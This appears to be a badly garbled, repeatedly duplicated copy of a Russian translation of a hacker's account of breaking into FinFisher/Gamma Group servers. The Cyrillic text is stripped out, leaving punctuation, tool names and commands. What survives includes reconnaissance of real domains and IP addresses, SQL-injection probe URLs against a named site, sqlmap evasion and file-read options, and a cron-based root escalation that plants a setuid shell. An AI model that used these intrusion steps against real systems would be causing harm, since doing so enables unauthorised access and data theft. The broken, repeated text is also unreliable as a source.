finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
